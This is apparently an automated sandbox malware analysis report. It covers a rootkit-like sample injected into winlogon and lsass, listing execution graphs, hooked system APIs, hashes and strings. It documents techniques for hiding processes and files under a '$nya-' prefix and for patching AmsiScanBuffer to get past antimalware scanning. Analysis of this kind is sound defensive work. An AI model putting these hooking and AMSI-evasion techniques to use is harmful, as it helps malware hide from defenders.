                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction ID: b65b3539fbd709d3eb2ea5f55c358f6cc5828dd715b3526b499a0208b2522084
                                            • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction Fuzzy Hash: F4E0ED72A51608AAF7199B62D8046AA76A1FFC8B19F848024CD090B310EE3D849A9792
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction ID: 4bb58136d852c2a653d8a036cd639210b1baa135ea19a913abf8e9fecaf76bee
                                            • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction Fuzzy Hash: BCE06D72A516089AF7198B22D80969832A1FF88B19FC5C020C90907310EE3D949A9692
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction ID: 44117e496ed412bfeff2ee36783a986e767d656568b4863f217f146fa26acdf1
                                            • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction Fuzzy Hash: 69E092B2A526089BF719CF22DC1478836E1FF8CF0AF858020C90907350EE3DD598D752

                                            Execution Graph

                                            Execution Coverage:1%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:0%
                                            Total number of Nodes:174
                                            Total number of Limit Nodes:13
                                            execution_graph 15098 17d2dd8c5d0 15099 17d2dd8c61b 15098->15099 15103 17d2dd8c5df _invalid_parameter_noinfo 15098->15103 15108 17d2dd8d1f4 15099->15108 15100 17d2dd8c602 HeapAlloc 15102 17d2dd8c619 15100->15102 15100->15103 15103->15099 15103->15100 15105 17d2dd8b470 15103->15105 15111 17d2dd8b4c0 15105->15111 15117 17d2dd8cb10 15108->15117 15116 17d2dd8c558 EnterCriticalSection 15111->15116 15118 17d2dd8cb59 GetLastError 15117->15118 15123 17d2dd8cb2f __std_exception_copy 15117->15123 15119 17d2dd8cb6c 15118->15119 15120 17d2dd8cb8a SetLastError 15119->15120 15122 17d2dd8cb87 15119->15122 15124 17d2dd8c940 _invalid_parameter_noinfo 11 API calls 15119->15124 15121 17d2dd8cb54 15120->15121 15121->15102 15122->15120 15123->15121 15126 17d2dd8c940 GetLastError 15123->15126 15124->15122 15127 17d2dd8c966 15126->15127 15128 17d2dd8c96c SetLastError 15127->15128 15144 17d2dd8d220 15127->15144 15129 17d2dd8c9e5 15128->15129 15129->15121 15132 17d2dd8c9a5 FlsSetValue 15135 17d2dd8c9c8 15132->15135 15136 17d2dd8c9b1 FlsSetValue 15132->15136 15133 17d2dd8c995 FlsSetValue 15151 17d2dd8d2a0 15133->15151 15157 17d2dd8c758 15135->15157 15138 17d2dd8d2a0 __free_lconv_num 7 API calls 15136->15138 15143 17d2dd8c9c6 SetLastError 15138->15143 15143->15129 15150 17d2dd8d231 _invalid_parameter_noinfo 15144->15150 15145 17d2dd8d282 15147 17d2dd8d1f4 __std_exception_copy 12 API calls 15145->15147 15146 17d2dd8d266 HeapAlloc 15148 17d2dd8c987 15146->15148 15146->15150 15147->15148 15148->15132 15148->15133 15149 17d2dd8b470 _invalid_parameter_noinfo 2 API calls 15149->15150 15150->15145 15150->15146 15150->15149 15152 17d2dd8d2a5 HeapFree 15151->15152 15153 17d2dd8c9a3 15151->15153 15152->15153 15154 17d2dd8d2c0 GetLastError 15152->15154 15153->15128 15155 17d2dd8d2cd __free_lconv_num 15154->15155 15156 17d2dd8d1f4 __std_exception_copy 11 API calls 15155->15156 15156->15153 15162 17d2dd8c630 15157->15162 15174 17d2dd8c558 EnterCriticalSection 15162->15174 14960 17d2dd51bc4 14967 17d2dd51724 GetProcessHeap HeapAlloc 14960->14967 14962 17d2dd51bda SleepEx 14963 17d2dd51724 50 API calls 14962->14963 14965 17d2dd51bd3 14963->14965 14965->14962 14966 17d2dd5159c StrCmpIW StrCmpW 14965->14966 15018 17d2dd519b0 14965->15018 14966->14965 15035 17d2dd51264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14967->15035 14969 17d2dd5174c 15036 17d2dd51000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14969->15036 14971 17d2dd51754 15037 17d2dd51264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14971->15037 14973 17d2dd5175d 15038 17d2dd51264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14973->15038 14975 17d2dd51766 15039 17d2dd51264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14975->15039 14977 17d2dd5176f 15040 17d2dd51000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14977->15040 14979 17d2dd51778 15041 17d2dd51000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14979->15041 14981 17d2dd51781 15042 17d2dd51000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14981->15042 14983 17d2dd5178a RegOpenKeyExW 14984 17d2dd519a2 14983->14984 14985 17d2dd517bc RegOpenKeyExW 14983->14985 14984->14965 14986 17d2dd517fb RegOpenKeyExW 14985->14986 14987 17d2dd517e5 14985->14987 14989 17d2dd5181f 14986->14989 14990 17d2dd51836 RegOpenKeyExW 14986->14990 15043 17d2dd512b8 RegQueryInfoKeyW 14987->15043 15052 17d2dd5104c RegQueryInfoKeyW 14989->15052 14993 17d2dd51871 RegOpenKeyExW 14990->14993 14994 17d2dd5185a 14990->14994 14996 17d2dd518ac RegOpenKeyExW 14993->14996 14997 17d2dd51895 14993->14997 14995 17d2dd512b8 16 API calls 14994->14995 14999 17d2dd51867 RegCloseKey 14995->14999 15001 17d2dd518d0 14996->15001 15002 17d2dd518e7 RegOpenKeyExW 14996->15002 15000 17d2dd512b8 16 API calls 14997->15000 14999->14993 15003 17d2dd518a2 RegCloseKey 15000->15003 15004 17d2dd512b8 16 API calls 15001->15004 15005 17d2dd51922 RegOpenKeyExW 15002->15005 15006 17d2dd5190b 15002->15006 15003->14996 15007 17d2dd518dd RegCloseKey 15004->15007 15009 17d2dd5195d RegOpenKeyExW 15005->15009 15010 17d2dd51946 15005->15010 15008 17d2dd5104c 6 API calls 15006->15008 15007->15002 15014 17d2dd51918 RegCloseKey 15008->15014 15012 17d2dd51981 15009->15012 15013 17d2dd51998 RegCloseKey 15009->15013 15011 17d2dd5104c 6 API calls 15010->15011 15015 17d2dd51953 RegCloseKey 15011->15015 15016 17d2dd5104c 6 API calls 15012->15016 15013->14984 15014->15005 15015->15009 15017 17d2dd5198e RegCloseKey 15016->15017 15017->15013 15062 17d2dd514a0 15018->15062 15035->14969 15036->14971 15037->14973 15038->14975 15039->14977 15040->14979 15041->14981 15042->14983 15044 17d2dd51323 GetProcessHeap HeapAlloc 15043->15044 15045 17d2dd51486 RegCloseKey 15043->15045 15046 17d2dd51472 GetProcessHeap HeapFree 15044->15046 15047 17d2dd5134e RegEnumValueW 15044->15047 15045->14986 15046->15045 15048 17d2dd513a1 15047->15048 15048->15046 15048->15047 15050 17d2dd513cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15048->15050 15051 17d2dd5141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 15048->15051 15057 17d2dd51530 15048->15057 15050->15051 15051->15048 15053 17d2dd511b5 RegCloseKey 15052->15053 15055 17d2dd510bf 15052->15055 15053->14990 15054 17d2dd510cf RegEnumValueW 15054->15055 15055->15053 15055->15054 15056 17d2dd5114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15055->15056 15056->15055 15058 17d2dd5154a 15057->15058 15061 17d2dd51580 15057->15061 15059 17d2dd51561 StrCmpIW 15058->15059 15060 17d2dd51569 StrCmpW 15058->15060 15058->15061 15059->15058 15060->15058 15061->15048 15063 17d2dd514e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 15062->15063 15064 17d2dd514c2 GetProcessHeap HeapFree 15062->15064 15064->15063 15064->15064 15095 17d2dd51e3c LoadLibraryA GetProcAddress 15096 17d2dd51e62 SleepEx 15095->15096 15097 17d2dd51e6f 15095->15097 15096->15096 15176 17d2dd527e8 NtQueryDirectoryFileEx 15177 17d2dd52998 15176->15177 15178 17d2dd52872 _invalid_parameter_noinfo 15176->15178 15178->15177 15179 17d2dd528c9 GetFileType 15178->15179 15180 17d2dd528ed 15179->15180 15181 17d2dd528d7 StrCpyW 15179->15181 15192 17d2dd51ad4 GetFinalPathNameByHandleW 15180->15192 15182 17d2dd528fc 15181->15182 15186 17d2dd5299d 15182->15186 15190 17d2dd52906 15182->15190 15184 17d2dd53f88 StrCmpNIW 15184->15186 15186->15177 15186->15184 15187 17d2dd53708 4 API calls 15186->15187 15188 17d2dd51dd4 2 API calls 15186->15188 15187->15186 15188->15186 15190->15177 15197 17d2dd53f88 15190->15197 15200 17d2dd53708 StrCmpIW 15190->15200 15204 17d2dd51dd4 15190->15204 15193 17d2dd51afe StrCmpNIW 15192->15193 15194 17d2dd51b3d 15192->15194 15193->15194 15195 17d2dd51b18 lstrlenW 15193->15195 15194->15182 15195->15194 15196 17d2dd51b2a StrCpyW 15195->15196 15196->15194 15198 17d2dd53faa 15197->15198 15199 17d2dd53f95 StrCmpNIW 15197->15199 15198->15190 15199->15198 15201 17d2dd53751 PathCombineW 15200->15201 15202 17d2dd5373a StrCpyW StrCatW 15200->15202 15203 17d2dd5375a 15201->15203 15202->15203 15203->15190 15205 17d2dd51df4 15204->15205 15206 17d2dd51deb 15204->15206 15205->15190 15207 17d2dd51530 2 API calls 15206->15207 15207->15205 15065 17d2dd52300 NtQuerySystemInformation 15066 17d2dd5233c 15065->15066 15067 17d2dd52412 15066->15067 15068 17d2dd52447 15066->15068 15076 17d2dd52355 15066->15076 15069 17d2dd5244c 15068->15069 15070 17d2dd524bb 15068->15070 15085 17d2dd535c8 GetProcessHeap HeapAlloc 15069->15085 15070->15067 15071 17d2dd524c0 15070->15071 15074 17d2dd535c8 11 API calls 15071->15074 15073 17d2dd5238d StrCmpNIW 15073->15076 15077 17d2dd52464 15074->15077 15075 17d2dd523b4 15075->15076 15079 17d2dd51d30 15075->15079 15076->15067 15076->15073 15076->15075 15077->15067 15077->15077 15080 17d2dd51db4 15079->15080 15081 17d2dd51d57 GetProcessHeap HeapAlloc 15079->15081 15080->15075 15081->15080 15082 17d2dd51d92 15081->15082 15091 17d2dd51cfc 15082->15091 15089 17d2dd5361b 15085->15089 15086 17d2dd536d9 GetProcessHeap HeapFree 15086->15077 15087 17d2dd536d4 15087->15086 15088 17d2dd53666 StrCmpNIW 15088->15089 15089->15086 15089->15087 15089->15088 15090 17d2dd51d30 6 API calls 15089->15090 15090->15089 15092 17d2dd51d13 15091->15092 15093 17d2dd51d1c GetProcessHeap HeapFree 15091->15093 15094 17d2dd51530 2 API calls 15092->15094 15093->15080 15094->15093

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 41 17d2dd527e8-17d2dd5286c NtQueryDirectoryFileEx 42 17d2dd52872-17d2dd52875 41->42 43 17d2dd52a90-17d2dd52ab3 41->43 42->43 44 17d2dd5287b-17d2dd52889 42->44 44->43 45 17d2dd5288f-17d2dd528d5 call 17d2dd640e0 * 3 GetFileType 44->45 52 17d2dd528ed-17d2dd528f7 call 17d2dd51ad4 45->52 53 17d2dd528d7-17d2dd528eb StrCpyW 45->53 54 17d2dd528fc-17d2dd52900 52->54 53->54 56 17d2dd529ed-17d2dd52a06 call 17d2dd5376c call 17d2dd53f88 54->56 57 17d2dd52906-17d2dd5290b 54->57 71 17d2dd5299d-17d2dd529e7 56->71 72 17d2dd52a08-17d2dd52a37 call 17d2dd5376c call 17d2dd53708 call 17d2dd51dd4 56->72 59 17d2dd5290e-17d2dd52913 57->59 60 17d2dd52930 59->60 61 17d2dd52915-17d2dd52918 59->61 64 17d2dd52933-17d2dd5294c call 17d2dd5376c call 17d2dd53f88 60->64 61->60 63 17d2dd5291a-17d2dd5291d 61->63 63->60 66 17d2dd5291f-17d2dd52922 63->66 79 17d2dd52952-17d2dd52981 call 17d2dd5376c call 17d2dd53708 call 17d2dd51dd4 64->79 80 17d2dd52a3f-17d2dd52a41 64->80 66->60 69 17d2dd52924-17d2dd52927 66->69 69->60 73 17d2dd52929-17d2dd5292e 69->73 71->43 71->56 72->71 94 17d2dd52a3d 72->94 73->60 73->64 79->80 101 17d2dd52987-17d2dd52992 79->101 83 17d2dd52a62-17d2dd52a65 80->83 84 17d2dd52a43-17d2dd52a5d 80->84 87 17d2dd52a6f-17d2dd52a72 83->87 88 17d2dd52a67-17d2dd52a6d 83->88 84->59 91 17d2dd52a74-17d2dd52a77 87->91 92 17d2dd52a8d 87->92 88->43 91->92 95 17d2dd52a79-17d2dd52a7c 91->95 92->43 94->43 95->92 98 17d2dd52a7e-17d2dd52a81 95->98 98->92 100 17d2dd52a83-17d2dd52a86 98->100 100->92 102 17d2dd52a88-17d2dd52a8b 100->102 101->59 103 17d2dd52998 101->103 102->43 102->92 103->43
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: File$DirectoryQueryType
                                            • String ID: \\.\pipe\
                                            • API String ID: 4175507832-91387939
                                            • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction ID: 13d1426295f582f1fef4479a0643aac2144f9f87ebd461d2444b396535ed9581
                                            • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction Fuzzy Hash: FB71D736208F8A52E734DF26B8443EA6BB4FB857C4F484016DD4D43B8ADEB5C68AC740

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 104 17d2dd52300-17d2dd5233a NtQuerySystemInformation 105 17d2dd52343-17d2dd52346 104->105 106 17d2dd5233c-17d2dd52340 104->106 107 17d2dd5234c-17d2dd5234f 105->107 108 17d2dd524f7-17d2dd52517 105->108 106->105 109 17d2dd52355-17d2dd52367 107->109 110 17d2dd52447-17d2dd5244a 107->110 109->108 111 17d2dd5236d-17d2dd52379 109->111 112 17d2dd5244c-17d2dd52466 call 17d2dd535c8 110->112 113 17d2dd524bb-17d2dd524be 110->113 114 17d2dd5237b-17d2dd5238b 111->114 115 17d2dd523a7-17d2dd523b2 call 17d2dd51cc4 111->115 112->108 122 17d2dd5246c-17d2dd52482 112->122 113->108 116 17d2dd524c0-17d2dd524d3 call 17d2dd535c8 113->116 114->115 118 17d2dd5238d-17d2dd523a5 StrCmpNIW 114->118 123 17d2dd523d3-17d2dd523e5 115->123 128 17d2dd523b4-17d2dd523cc call 17d2dd51d30 115->128 116->108 127 17d2dd524d5-17d2dd524dd 116->127 118->115 118->123 122->108 126 17d2dd52484-17d2dd524a0 122->126 129 17d2dd523f5-17d2dd523f7 123->129 130 17d2dd523e7-17d2dd523e9 123->130 131 17d2dd524a4-17d2dd524b7 126->131 127->108 134 17d2dd524df-17d2dd524e7 127->134 128->123 144 17d2dd523ce-17d2dd523d1 128->144 132 17d2dd523fe 129->132 133 17d2dd523f9-17d2dd523fc 129->133 136 17d2dd523f0-17d2dd523f3 130->136 137 17d2dd523eb-17d2dd523ee 130->137 131->131 139 17d2dd524b9 131->139 138 17d2dd52401-17d2dd52404 132->138 133->138 140 17d2dd524ea-17d2dd524f5 134->140 136->138 137->138 142 17d2dd52412-17d2dd52415 138->142 143 17d2dd52406-17d2dd5240c 138->143 139->108 140->108 140->140 142->108 145 17d2dd5241b-17d2dd5241f 142->145 143->111 143->142 144->138 146 17d2dd52421-17d2dd52424 145->146 147 17d2dd52436-17d2dd52442 145->147 146->108 148 17d2dd5242a-17d2dd5242f 146->148 147->108 148->145 149 17d2dd52431 148->149 149->108
                                            APIs
                                            • NtQuerySystemInformation.NTDLL ref: 0000017D2DD5232B
                                            • StrCmpNIW.SHLWAPI ref: 0000017D2DD5239A
                                              • Part of subcall function 0000017D2DD535C8: GetProcessHeap.KERNEL32(?,?,?,?,?,0000017D2DD524D1), ref: 0000017D2DD535EB
                                              • Part of subcall function 0000017D2DD535C8: HeapAlloc.KERNEL32(?,?,?,?,?,0000017D2DD524D1), ref: 0000017D2DD535FE
                                              • Part of subcall function 0000017D2DD535C8: StrCmpNIW.SHLWAPI(?,?,?,?,?,0000017D2DD524D1), ref: 0000017D2DD53673
                                              • Part of subcall function 0000017D2DD535C8: GetProcessHeap.KERNEL32(?,?,?,?,?,0000017D2DD524D1), ref: 0000017D2DD536D9
                                              • Part of subcall function 0000017D2DD535C8: HeapFree.KERNEL32(?,?,?,?,?,0000017D2DD524D1), ref: 0000017D2DD536E7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFreeInformationQuerySystem
                                            • String ID: $nya-$S
                                            • API String ID: 722747020-3492252248
                                            • Opcode ID: 4ac77b2c6d0e63e88a47bc1c42b4b05fc6ca31a13af142bc6dc0eee490c53e66
                                            • Instruction ID: 850f05bd11e511c281c5463248047073372b965f77c52c85919e52c47a673e3b
                                            • Opcode Fuzzy Hash: 4ac77b2c6d0e63e88a47bc1c42b4b05fc6ca31a13af142bc6dc0eee490c53e66
                                            • Instruction Fuzzy Hash: ED519032A18F6886F760CB65A4807ED6BB8FB65788F08C415DE4D56B46DBB9C8C6C340

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                            • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                            • API String ID: 1735320900-4225371247
                                            • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction ID: 96f4f97e7589e417bfd216c0fa725ebf6ad4169998ba69a4a526b571fa602114
                                            • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction Fuzzy Hash: AC5148B4518F8EA5FA00EBA9FC51BD46B30AF40744F889A53940D0656BDEB882DFC780

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction ID: 682f90f5b637f35a2c3d5446783d20b17b34457fb52783b3e1abf76f5c572ba5
                                            • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction Fuzzy Hash: 38F04F72308B8992EB208F25F9843997371FB45BC8F884021DB4D4695ADE6CC6CACB80

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProcSleep
                                            • String ID: AmsiScanBuffer$amsi.dll
                                            • API String ID: 188063004-3248079830
                                            • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction ID: e07f860e85c6e67f3043271f4cb48da2854f5ab70fe7cc9399e9ad5156588ed3
                                            • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction Fuzzy Hash: 0CD09E30659F48D5FA086F55FC543D43271BFA4B41FCC4415C60E012A6DE6C85DB83C0

                                            Control-flow Graph

                                            APIs
                                            • GetModuleFileNameW.KERNEL32 ref: 0000017D2DD53A35
                                            • PathFindFileNameW.SHLWAPI ref: 0000017D2DD53A44
                                              • Part of subcall function 0000017D2DD53F88: StrCmpNIW.SHLWAPI(?,?,?,0000017D2DD5272F), ref: 0000017D2DD53FA0
                                              • Part of subcall function 0000017D2DD53EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,0000017D2DD53A5B), ref: 0000017D2DD53EDB
                                              • Part of subcall function 0000017D2DD53EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000017D2DD53A5B), ref: 0000017D2DD53F0E
                                              • Part of subcall function 0000017D2DD53EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000017D2DD53A5B), ref: 0000017D2DD53F2E
                                              • Part of subcall function 0000017D2DD53EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000017D2DD53A5B), ref: 0000017D2DD53F47
                                              • Part of subcall function 0000017D2DD53EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000017D2DD53A5B), ref: 0000017D2DD53F68
                                            • CreateThread.KERNELBASE ref: 0000017D2DD53A8B
                                              • Part of subcall function 0000017D2DD51E74: GetCurrentThread.KERNEL32 ref: 0000017D2DD51E7F
                                              • Part of subcall function 0000017D2DD51E74: CreateThread.KERNELBASE ref: 0000017D2DD52043
                                              • Part of subcall function 0000017D2DD51E74: TlsAlloc.KERNEL32 ref: 0000017D2DD52049
                                              • Part of subcall function 0000017D2DD51E74: TlsAlloc.KERNEL32 ref: 0000017D2DD52055
                                              • Part of subcall function 0000017D2DD51E74: TlsAlloc.KERNEL32 ref: 0000017D2DD52061
                                              • Part of subcall function 0000017D2DD51E74: TlsAlloc.KERNEL32 ref: 0000017D2DD5206D
                                              • Part of subcall function 0000017D2DD51E74: TlsAlloc.KERNEL32 ref: 0000017D2DD52079
                                              • Part of subcall function 0000017D2DD51E74: TlsAlloc.KERNEL32 ref: 0000017D2DD52085
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                            • String ID:
                                            • API String ID: 2779030803-0
                                            • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
